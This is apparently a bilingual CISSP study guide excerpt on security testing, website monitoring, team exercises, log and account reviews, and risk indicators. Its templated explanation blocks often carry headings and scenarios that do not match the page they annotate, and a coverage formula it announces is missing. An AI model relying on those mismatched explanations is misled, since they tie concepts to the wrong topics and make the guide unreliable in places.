在某些应用程序中,存在软件用户可能试图滥用应用程序的明显示例。 例如, 银行软件的用户可能尝试操纵输入字符串以访问其他用户的账户。 他们还可能 尝试从已透支的账户中提取资金。 软件测试人员使用一种称为滥用案例测试或 滥用情况测试的过程,来评估其软件对这些已知风险的脆弱性。 在误用案例测试中,测试人员首先列出已知的误用案例,然后尝试使用手动和/ 或自动化攻击技术来利用这些误用案例。 测试覆盖率分析 测试是任何软件开发过程中的重要部分,但不幸的是,完全测试任何软件都 是不可能的。 软件可能出现故障或遭受攻击的方式实在太多。 软件测试专业 人员通常会进行测试覆盖率分析,以估算针对新软件所执行的测试程度。 测 试覆盖率通过以下公式计算: 当然,这是一个高度主观的计算。 准确计算测试覆盖率需要列举所有可能的 使用案例,这是一项极其困难的任务。 因此,任何使用测试覆盖率计算的人 在解释结果时,都应仔细了解用于生成输入值的过程。 测试覆盖率分析公式可以调整以使用多种不同的标准。 以下是五种常见的标准: 分支覆盖率:每个if语句是否在所有if和else条件下都已执行? 条件覆盖:代码中的每个逻辑测试是否都在所有输入组合下被执行过?

Functioncovera ge:代码中的每个函数是否都被调用并 返回了结果? 循环覆盖率:代码中的每个循环是否都在导致代码多次执行、仅执行一次和 不执行的条件下被执行过

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1071 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 44 / PDF P1072

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

at all? Statement coverage: Has every line of code been executed during the test? Website Monitoring Security professionals also often become involved in the ongoing monitoring of websites for performance management, troubleshooting, and the identification of potential security issues. This type of monitoring comes in two different forms: Passive monitoring analyzes actual network traffic sent to a website by capturing it as it travels over the network or reaches the server. This provides real-world monitoring data that gives administrators insight into what is actually happening on a network.

Real user monitoring (RUM) is a variant of passive monitoring where the monitoring tool reassembles the activity of individual users to track their interaction with a website. Synthetic monitoring (or active monitoring) performs artificial transactions against a website to assess performance. This may be as simple as requesting a page from the site to determine the response time, or it may execute a complex script designed to identify the results of a transaction. These two techniques are often used in conjunction with each other because they achieve different results.

Passive monitoring is only able to detect issues after they occur for a real user because it is monitoring real user activity. Passive monitoring is particularly useful for troubleshooting issues identified by users because it allows the capture of traffic related to that issue. Synthetic monitoring may miss issues experienced by real users if they are not included in the testing scripts, but it is capable of detecting issues before they actually occur. Training and Exercises Organizations conduct a wide variety of training programs designed to help employees understand their cybersecurity role. Information security professionals often participate in training programs that are set up as ?

中文直译 / 整理

语句覆盖率:在测试过程中是否执行了每一行代码? 网站监控 安全专业人员通常也会参与网站的持续监控,以进行性能管理、故障排除以及 识别潜在的安全问题。 这种监控分为两种不同形式: 被动监控通过在网络中捕获传输到网站的网络流量,或在其到达服务器时 进行捕获,来分析实际的网络流量。 这提供了真实的监控数据,使管理员 能够了解网络上实际发生的情况。 真实用户监控(RUM)是被动监控的一 种变体,监控工具会重组单个用户的活动,以跟踪他们与网站的交互。 合成监控(或主动监控)通过对网站执行人工事务来评估性能。 这可能只 是简单地请求网站上的一个页面以确定响应时间,也可能执行一个复杂的 脚本,以识别 事务的结果。 这两种技术通常结合使用,因为它们能实现不同的效果。 被动监控只能在真实 用户遇到问题后检测到问题,因为它监控的是真实用户的活动。 被动监控在排 查用户报告的问题时特别有用,因为它可以捕获与该问题相关的流量。 合成监 控如果未将真实用户的使用场景纳入测试脚本,则可能遗漏真实用户遇到的问 题,但它能够提前检测到问题的发生。 培训与演练 组织开展多种多样的培训项目,旨在帮助员工了解其在网络安全中的职责。 信息安全专业人员经常参与以

小白解释

场景先行:你是公司的安全负责人,正在读第 1072 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
学习单元 45 / PDF P1073

第 1073 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

exercises using a competition-style format, pitting a team of attackers against a team of defenders. Running exercises helps to identify vulnerabilities in the organization's systems, networks, and applications, similar to the results achieved from penetration testing. Exercises also provide employees with hands-on experience both attacking and defending systems. This helps boost cybersecurity skills and awareness among the technical staff. When conducting an exercise, participants are often divided into three teams: Red team members are the attackers who attempt to gain access to systems. Blue team members are the defenders who must secure systems and networks from attack.

The blue team also monitors the environment during the exercise, conducting active defense techniques. The blue team commonly gets a head start with some time to secure systems before the attack phase of the exercise begins. White team members are the observers and judges. They serve as referees to settle disputes over the rules and watch the exercise to document lessons learned from the test. The white team is able to observe the activities of both the red and blue teams and is also responsible for ensuring that the exercise does not cause production issues.

Purple Teaming At the end of an exercise, it's common to bring the red and the blue teams together to share information about tactics and lessons learned. Each team walks the other through their role in the exercise, helping everyone learn from the process. This combination of knowledge from the red and blue teams is often referred to as purple teaming, because combining red and blue makes purple. Capture the flag (CTF) exercises are a fun way to achieve training objectives. In a CTF exercise, the red team begins with set objectives, such as disrupting a website, stealing a file from a secured system, or causing other security failures.

The exercise is scored based on how many objectives the red team

中文直译 / 整理

竞赛形式进行的演练,由一支攻击团队与一支防御团队进行对抗。 运行演练有助于识别组织系统、网络和应用程序中的漏洞,其效果类似于 渗透测试的结果。 演练还为员工提供了攻击和防御系统的实战经验,有助 于提升技术人员的网络安全技能和意识。 在进行演练时,参与者通常被分为三个团队: 红队成员是攻击者,试图获取对系统的访问权限。 蓝队成员是防御者,必须保护系统和网络免受攻击。 蓝队在演练期间还会 监控环境,采用主动防御技术。 蓝队通常会提前获得一些时间,在攻击阶 段开始前加固系统。 白队成员是观察员和裁判。 他们担任裁判,解决规则争议,并观 察演练过程以记录测试中获得的经验教训。 白队能够观察红队和蓝队 的活动,并负责确保演练不会造成生产问题。 紫队协同 在演练结束时,通常会将红队和蓝队召集在一起,分享关于战术和所获经 验的信息。 每支队伍都会向另一支队伍介绍自己在演练中的角色,帮助所 有人从过程中学习。 红队和蓝队知识的结合通常被称为紫队演练,因为红 色和蓝色混合会形成紫色。 捕获旗标(CTF)练习是一种实现培训目标的有趣方式。 在CTF练习中,红队从一 组既定目标开始,例如中断网站、从安全系统中窃取文件或造成其他安全故障。

该 练习的评分基于红队成功完成的目标数量与蓝队阻止其执行的目标数量的对比。

小白解释

场景先行:你是公司的安全负责人,正在读第 1073 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1073 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 46 / PDF P1074

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

was able to achieve compared to how many the blue team prevented them from executing. Exercises don't need to take place using production systems. In many cases, an organization might set up a special environment solely for the purpose of the exercise. This provides a safe playground for the test and minimizes the probability that an attack will damage production systems. Other exercises may not even use real systems at all. Tabletop exercises simply gather participants in the same room to walk through their response to a fictitious exercise scenario.

Implementing Security Management Processes and Collecting Security Process Data In addition to performing assessments and testing, sound information security programs also include a variety of management processes designed to oversee the effective operation of the information security program. These processes are a critical feedback loop in the security assessment process because they provide management oversight and have a deterrent effect against the threat of insider attacks. They also provide an opportunity to collect security process data for use in other security tasks.

The security management reviews that fill this need include log reviews, account management, backup verification, and key performance and risk indicators. Each of these reviews should follow a standardized process that includes management approval at the completion of the review. Log Reviews In Chapter 16, you will learn the importance of storing log data and conducting both automated and manual log reviews. Security information and event management (SIEM) packages play an important role in these processes, automating much of the routine work of log review. These devices collect information using the syslog functionality present in many devices, operating systems, and applications.

Some devices, including Windows systems, may require third-party clients to add syslog support. Administrators may choose to deploy logging policies through Windows Group Policy Objects (GPOs) and other mechanisms that can deploy and enforce standard policies throughout the organization.

中文直译 / 整理

被成功阻止的目标数量。 演练不一定需要在生产系统中进行。 在许多情况下,组织可能会建立一个专门 用于演练的特殊环境。 这为测试提供了一个安全的试验场,并最大限度地降低 了攻击对生产系统造成损害的可能性。 其他演练甚至可能完全不使用真实系统。 桌面演练仅将参与者聚集在同一房间内,模拟应对虚构的演练场景。 实施安全管理流程并收集安全流程数据 除了执行评估和测试外,健全的信息安全计划还包括多种管理流程,旨在监督 信息安全计划的有效运行。 这些流程是安全评估过程中的关键反馈环节,因为 它们提供了管理监督,并对内部攻击威胁具有威慑作用。 它们还为收集安全流 程数据以用于其他安全任务提供了机会。 满足这一需求的安全管理审查包括日志审查、账户管理、备份验证以及关键 绩效和风险指标。 每一项审查都应遵循标准化流程,并在审查完成后获得管 理批准。 日志审查 s 在 第16章中,您将了解存储日志数据以及进行自动化和手动日志审查的重要性。 安全信息和事件管理(SIEM)软件包在这些过程中发挥着重要作用,能够自动 化日志审查的大量常规工作。 这些设备利用许多设备、操作系统和应用程序中 内置的syslog功能收集信息。

一些设备,包括Windows系统,可能需要第三方 客户端来添加syslog支持。 管理员可以选择通过Windows组策略对象(GPO) 和其他机制部署日志策略,以在整个组织中部署和强制执行标准策略。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 47 / PDF P1075

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Logging systems should also make use of the Network Time Protocol (NTP) to ensure that clocks are synchronized on systems sending log entries to the SIEM as well as the SIEM itself. This ensures that information from multiple sources has a consistent timeline. Information security managers should also periodically conduct log reviews, particularly for sensitive functions, to ensure that privileged users are not abusing their privileges.

For example, if an information security team has access to eDiscovery tools that allow searching through the contents of individual user files, security managers should routinely review the logs of actions taken by those administrative users to ensure that their file access relates to legitimate eDiscovery initiatives and does not violate user privacy. Network flow (NetFlow) logs are particularly useful when investigating security incidents. These logs provide records of the connections between systems and the amount of data transferred. Account Management Account management reviews ensure that users only retain authorized permissions and that unauthorized modifications do not occur.

Account management reviews may be a function of information security management personnel or internal auditors. One way to perform account management is to conduct a full review of all accounts. This is typically done only for highly privileged accounts because of the amount of time consumed. The exact process may vary from organization to organization, but here's one example: 1. Managers ask system administrators to provide a list of users with privileged access and the privileged access rights. They may monitor the administrator as they retrieve this list to avoid tampering. 2.

Managers ask the privilege approval authority to provide a list of authorized users and the privileges they should be assigned. 3. The managers then compare the two lists to ensure that only authorized users retain access to the system and that the access of each user does not exceed their authorization.

中文直译 / 整理

日志系统还应使用网络时间协议(NTP),以确保向SIEM发送日志条目的系 统以及SIEM本身的时钟保持同步。 这可以确保来自多个来源的信息具有统一 的时间线。 信息安全管理人员还应定期进行日志审查,特别是针对敏感功能,以确保特权 用户不会滥用其权限。 例如,如果信息安全团队拥有访问eDiscovery工具的 权限,该工具允许搜索单个用户文件的内容,则安全管理人员应定期审查这些 管理员用户所执行操作的日志,以确保其文件访问行为与合法的e Discovery倡议相关,且不侵犯用户隐私。 网络流(NetFlow)日志在调查安全事件时特别有用。 这些日志提 供了系统之间连接的记录以及传输的数据量。 账户管理 账户管理审查可确保用户仅保留授权的权限,并防止未经授权的修改。 账户管 理审查可由信息安全管理人员或内部审计人员执行。 执行账户管理的一种方法是对所有账户进行全面审查。 由于耗时较多,此操作 通常仅针对高权限账户进行。 具体流程可能因组织而异,但以下是一个示例: 1. 管理人员要求系统管理员提供具有特权访问权限的用户列表及其特权访 问权限。 他们可在管理员获取该列表时进行监控,以避免篡改。

2. 管理人员要求特权审批机构提供授权用户列表及其应被分配的权限。 3. 管理员随后比较这两个列表,以确保只有经过授权的用户保留对系统的访 问权限,且每个用户的访问权限不超过其授权范围。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

审计:审计检查控制是否存在、是否有效、是否符合要求。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

审计题关注独立性、证据、范围和报告。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 48 / PDF P1076

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

This process may include many other checks, such as verifying that terminated users do not retain access to the system, checking the paper trail for specific accounts, or other tasks. Organizations that do not have time to conduct this thorough process may use sampling instead. In this approach, managers pull a random sample of accounts and perform a full verification of the process used to grant permissions for those accounts. If no significant flaws are found in the sample, they make the assumption that this is representative of the entire population. Sampling only works if it is random!

Don't allow system administrators to generate the sample or use nonrandom criteria to select accounts for review, or you may miss entire categories of users where errors may exist. Organizations may also automate portions of their account review process. Many identity and access management (IAM) vendors provide account review workflows that prompt administrators to conduct reviews, maintain documentation for user accounts, and provide an audit trail demonstrating the completion of reviews. Disaster Recovery and Business Continuity In Chapter 3, “Business Continuity Planning,” you learned how organizations design continuity controls to maintain operations in the face of potential disruptions.

In Chapter 18, “Disaster Recovery Planning,” you will learn the importance of supplementing those continuity controls with disaster recovery programs that help organizations resume operations quickly after a disruption. Consistent backup programs are an extremely important component of these efforts. Managers should periodically inspect the results of backups to verify that the process functions effectively and meets the organization's data protection needs. This may involve reviewing logs, inspecting hash values, or requesting an actual restore of a system or file.

Regular testing of disaster recovery and business continuity controls provides organizations with the assurance that they are effectively protected against

中文直译 / 整理

此过程可能还包括许多其他检查,例如验证已离职用户是否不再保留对系统 的访问权限、检查特定账户的书面记录,或其他任务。 没有时间完成这一彻底过程的组织可以改用抽样方法。 在这种方法中,管理 人员抽取一组随机账户,并对这些账户的权限授予流程进行全面验证。 如果 在抽样中未发现重大缺陷,则可假设该样本具有代表性,能够反映整体情况。 抽样仅在随机的前提下有效! 不要允许系统管理员生成样本或使用非 随机标准选择账户进行审查,否则您可能会遗漏存在错误的整个用户类别。 组织还可以自动化其账户审查过程的部分环节。 许多身份与访问管理(IAM) 供应商提供账户审查工作流,可提醒管理员开展审查、维护用户账户文档,并 提供审计追踪,以证明审查已完成。 灾难恢复与业务连续性 在 第3章“业务连续性规划”中,您学习了组织如何设计连续性控制措施,以 在面临潜在中断时维持运营。 在 第18章“灾难恢复规划”中,您将了解如何通 过灾难恢复计划补充这些连续性控制措施,以帮助组织在中断后迅速恢复运营。 一致的备份程序是这些努力中极为重要的组成部分。 管理人员应定期检查备份 结果,以验证该过程是否有效运行并满足组织的数据保护需求。

这可能包括审 查日志、检查哈希值或请求实际恢复系统或文件。 定期测试灾难恢复和业务连续性控制措施,可使组织确信其有效防范

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 49 / PDF P1077

第 1077 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

disruptions to business operations. Training and Awareness Training and awareness programs play a crucial role in preparing an organization's workforce to support information security programs. These efforts educate employees about current threats and advise them on best practices for protecting information and systems under their care from attack. These programs should begin with initial training designed to provide foundational knowledge to employees who are either joining the organization for the first time or moving into a new role with different security responsibilities.

This initial training should be tailored to an individual's role, providing them with the specific, actionable information that they need to carry out their security responsibilities. Recurring training and awareness efforts should take place throughout the year, reminding employees of their responsibilities and updating them on changes to the organization's operating environment and the threat landscape. Many organizations use phishing simulations to evaluate the effectiveness of their security awareness programs. These simulations use fake phishing messages to determine whether users are susceptible to phishing attacks.

Users who click the link or otherwise respond to the simulated attacks are redirected to training resources to help them better identify suspicious activity. You'll find complete coverage of security training and awareness programs in Chapter 2, “Personnel Security and Risk Management Concepts.” Key Performance and Risk Indicators Security managers should also monitor key performance and risk indicators on an ongoing basis. The exact metrics they monitor will vary from organization to organization but may include the following: Number of open vulnerabilities Time to resolve vulnerabilities Vulnerability/defect recurrence Number of compromised accounts

中文直译 / 整理

业务运营中断。 培训与意识 培训和意识计划在帮助组织员工支持信息安全计划方面起着至关重要的作用。 这些举措教育员工了解当前的威胁,并指导他们采取最佳实践,以保护其负责 的信息和系统免受攻击。 这些计划应从初始培训开始,旨在为新加入组织或转入具有不同安全职责的新 岗位的员工提供基础知识。 初始培训应根据个人角色量身定制,向其提供履行 安全职责所需的特定、可操作的信息。 全年应持续开展培训和意识活动,提醒员工履行其职责,并更新他们关于组 织运营环境和威胁态势的变化。 许多组织使用钓鱼模拟来评估其安全意识计划的有效性。 这些模拟通过发送虚 假的钓鱼邮件,判断用户是否容易受到钓鱼攻击。 点击链接或以其他方式响应 模拟攻击的用户将被重定向至培训资源,以帮助他们更好地识别可疑活动。 您将在第2章“人员安全与风险管理概念”中找到关于安全培训和意识计划的完整 内容。 关键性能与风险指标 安全管理人员还应持续监控关键绩效和风险指标。 他们监控的具体指标因组 织而异,但可能包括以下内容: 未修复漏洞数量 修复漏洞所需时间 漏洞/缺陷复发率 被入侵账户数量

小白解释

场景先行:你是公司的安全负责人,正在读第 1077 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1077 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 50 / PDF P1078

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Number of software flaws detected in preproduction scanning Repeat audit findings User attempts to visit known malicious sites Once an organization identifies the key security metrics it wishes to track, managers may want to develop a dashboard that clearly displays the values of these metrics over time and display it where both managers and the security team will regularly see it, such as on an intranet. Summary Security assessment and testing programs play a critical role in ensuring that an organization's security controls remain effective over time.

Changes in business operations, the technical environment, security risks, and user behavior may alter the effectiveness of controls that protect the confidentiality, integrity, and availability of information assets. Assessment and testing programs monitor those controls and highlight changes requiring administrator intervention. Security professionals should carefully design their assessment and testing program and revise it as business needs change. Security tests verify that a control is functioning properly. With vulnerability assessments, security professionals perform a variety of tests to identify misconfigurations and other security flaws in systems and applications.

Network discovery tests identify systems on the network with open ports. Network vulnerability scans discover known security flaws on those systems. Web vulnerability scans probe the operation of web applications searching for known vulnerabilities. Software plays a critical role in any security infrastructure because it handles sensitive information and interacts with critical resources. Organizations should use a code review process to allow peer validation of code before moving it to production. Rigorous software testing programs also include the use of static testing, dynamic testing, fuzz testing, interface testing, and misuse case testing to robustly evaluate software.

Security management processes include log reviews, account management, disaster recovery and business continuity, backup verification, training and awareness, and tracking of key performance and risk indicators. These processes help security managers validate the ongoing effectiveness of the

中文直译 / 整理

预生产扫描中发现的软件缺陷数量 重复审计发现 用户尝试访问已知的恶意网站 一旦组织确定了其希望跟踪的关键安全指标,管理人员可能希望创建一个仪表 板,清晰地显示这些指标随时间的变化值,并将其展示在管理人员和安全团队 经常能看到的地方,例如内网。 摘要 安全评估与测试程序在确保组织的安全控制措施持续有效方面发挥着至关重要 的作用。 业务运营、技术环境、安全风险和用户行为的变化可能会改变保护信 息资产的 机密性、完整性和可用性的控制措施的有效性。 评估与测试程序监控这些控制 措施,并突出显示需要管理员干预的变化。 安全专业人员应仔细设计其评估与 测试程序,并根据业务需求的变化进行修订。 安全测试用于验证控制措施是否正常运行。 在漏洞评估中,安全专业人员执行 多种测试,以识别系统和应用程序中的配置错误和其他安全缺陷。 网络发现测 试用于识别网络上具有开放端口的系统。 网络漏洞扫描用于发现这些系统上的 已知安全缺陷。 Web漏洞扫描则探测Web应用程序的运行情况,以查找已知的 漏洞。 软件在任何安全基础设施中都起着关键作用,因为它处理敏感信息并与关键资 源交互。 组织应使用代码审查流程,在将代码部署到生产环境前允许同行进行 验证。

严格的软件测试程序还包括使用静态测试、动态测试、模糊测试、接口 测试和误用案例测试,以全面评估软件。 安全管理流程包括日志审查、账户管理、灾难恢复与业务连续性、备份验证、 培训与意识提升,以及关键绩效和风险指标的跟踪。 这些流程有助于安全管 理人员验证信息安全计划的持续有效性

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

